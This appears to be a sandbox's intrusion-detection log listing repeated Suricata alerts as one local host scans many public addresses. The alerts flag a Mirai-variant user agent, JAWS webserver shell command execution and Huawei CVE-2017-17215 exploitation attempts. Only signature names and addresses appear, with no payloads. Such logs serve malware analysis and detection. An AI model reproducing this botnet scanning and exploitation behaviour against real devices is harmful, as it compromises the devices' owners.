              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:47718 -> 41.39.69.139:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:43838 -> 220.194.72.146:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:47718 -> 41.39.69.139:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:43838 -> 220.194.72.146:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:48854 -> 76.137.1.180:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:56918 -> 199.63.47.209:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:48854 -> 76.137.1.180:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:56918 -> 199.63.47.209:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:43196 -> 74.202.42.9:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:41162 -> 54.251.33.18:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:43196 -> 74.202.42.9:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:37124 -> 31.174.97.135:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:41162 -> 54.251.33.18:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:38348 -> 2.113.145.26:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:56248 -> 220.183.243.172:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:58222 -> 60.220.250.249:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:38348 -> 2.113.145.26:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:36596 -> 83.133.89.182:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:58222 -> 60.220.250.249:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:36596 -> 83.133.89.182:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:45780 -> 126.176.228.197:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:38382 -> 57.0.217.84:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:41704 -> 83.238.144.61:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:38382 -> 57.0.217.84:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:60696 -> 25.119.53.5:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:39280 -> 84.153.123.235:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:45780 -> 126.176.228.197:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:49952 -> 160.19.223.25:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:49952 -> 160.19.223.25:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:49432 -> 70.252.93.59:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:35476 -> 171.186.242.22:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:37124 -> 31.174.97.135:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:35476 -> 171.186.242.22:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:49432 -> 141.20.42.238:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:50544 -> 113.9.76.55:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:39280 -> 84.153.123.235:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:49432 -> 141.20.42.238:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:50544 -> 113.9.76.55:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:41704 -> 83.238.144.61:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:49432 -> 70.252.93.59:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:45518 -> 139.241.185.96:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:43794 -> 23.15.127.183:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:60696 -> 25.119.53.5:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:46168 -> 66.85.21.139:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:48318 -> 86.35.202.69:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:49544 -> 39.92.130.206:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:46168 -> 66.85.21.139:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:35974 -> 128.120.255.4:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:35974 -> 128.120.255.4:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:49544 -> 39.92.130.206:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:53316 -> 187.217.155.175:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:56418 -> 90.198.87.168:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:56418 -> 90.198.87.168:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:35610 -> 97.197.78.241:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:53316 -> 187.217.155.175:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:38648 -> 137.251.33.154:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:38648 -> 137.251.33.154:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:45518 -> 139.241.185.96:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:54582 -> 211.243.248.192:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:35610 -> 97.197.78.241:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:43794 -> 23.15.127.183:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:52556 -> 174.26.69.187:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:54582 -> 211.243.248.192:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:37846 -> 63.54.131.20:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:37846 -> 63.54.131.20:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:48318 -> 86.35.202.69:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:54386 -> 8.144.12.88:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:54386 -> 8.144.12.88:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:42838 -> 161.104.195.78:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:42838 -> 161.104.195.78:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:33386 -> 9.120.59.100:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:33386 -> 9.120.59.100:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:52556 -> 174.26.69.187:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:37570 -> 158.116.133.144:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:57624 -> 190.1.187.23:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:37570 -> 158.116.133.144:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:57624 -> 190.1.187.23:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:34360 -> 156.146.215.98:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:35178 -> 179.192.200.231:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:35178 -> 179.192.200.231:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:39126 -> 41.190.19.200:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:38216 -> 74.93.106.203:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:34312 -> 41.253.49.66:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:58746 -> 70.27.202.249:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:38216 -> 74.93.106.203:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:58746 -> 70.27.202.249:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:41832 -> 156.158.79.191:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:52356 -> 113.60.71.8:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:52356 -> 113.60.71.8:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:49078 -> 197.88.243.218:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:51222 -> 156.228.164.110:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:54430 -> 156.158.216.173:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:35298 -> 41.127.128.0:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:47078 -> 41.114.117.190:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:41990 -> 197.79.247.50:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:38708 -> 197.198.35.16:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:53756 -> 197.57.30.186:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:40228 -> 197.152.15.124:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:47110 -> 197.44.208.174:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:40230 -> 156.80.185.156:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:50026 -> 156.206.254.225:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:41612 -> 156.193.79.196:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:59390 -> 37.111.84.54:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:59390 -> 37.111.84.54:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:51986 -> 54.130.141.170:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:51986 -> 54.130.141.170:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:58656 -> 156.64.0.128:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:55192 -> 197.104.233.253:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:53108 -> 197.58.88.197:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:57236 -> 156.60.115.244:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:53304 -> 156.28.114.59:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:39020 -> 156.127.18.248:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:41508 -> 156.99.113.24:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:34764 -> 197.34.184.215:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:57748 -> 197.234.52.32:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:35880 -> 41.136.19.221:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:59756 -> 197.243.83.152:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:40618 -> 41.204.54.254:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:41032 -> 156.147.94.235:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:55670 -> 156.166.178.3:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:44816 -> 156.53.45.244:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:39920 -> 197.116.128.117:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:50130 -> 156.14.214.230:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:39468 -> 197.80.140.137:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:55838 -> 202.190.152.115:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:36886 -> 197.119.87.185:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:52954 -> 156.79.255.142:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:36858 -> 156.80.73.90:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:47382 -> 41.210.51.165:37215
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:55838 -> 202.190.152.115:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:37002 -> 156.237.202.67:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:51666 -> 197.158.248.189:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:58970 -> 197.58.112.233:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:37292 -> 194.10.184.124:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:37292 -> 194.10.184.124:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:39100 -> 156.225.90.134:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:53070 -> 197.137.12.64:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:45310 -> 156.41.200.154:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:41392 -> 156.121.211.228:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:43392 -> 156.236.14.88:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:59104 -> 197.214.151.188:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:47016 -> 161.225.186.189:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:47016 -> 161.225.186.189:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:33964 -> 18.238.109.205:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:33964 -> 18.238.109.205:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:48378 -> 197.153.147.0:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:45358 -> 41.234.149.164:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:52344 -> 41.13.201.6:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:35024 -> 156.165.110.101:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:46044 -> 41.59.4.95:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:35704 -> 41.24.75.89:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:56160 -> 156.73.163.22:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:60698 -> 1.19.246.235:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:60698 -> 1.19.246.235:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:42332 -> 197.171.131.230:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:42332 -> 197.171.131.230:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:51154 -> 197.182.81.17:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:46452 -> 24.76.98.2:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:46452 -> 24.76.98.2:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:39036 -> 156.130.121.177:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:50394 -> 156.242.156.33:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:56378 -> 193.158.34.34:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:56378 -> 193.158.34.34:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:59366 -> 156.80.97.59:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:52604 -> 156.47.87.157:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:56938 -> 83.248.130.23:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:56938 -> 83.248.130.23:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:45858 -> 197.214.176.83:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:33700 -> 197.71.189.138:37215
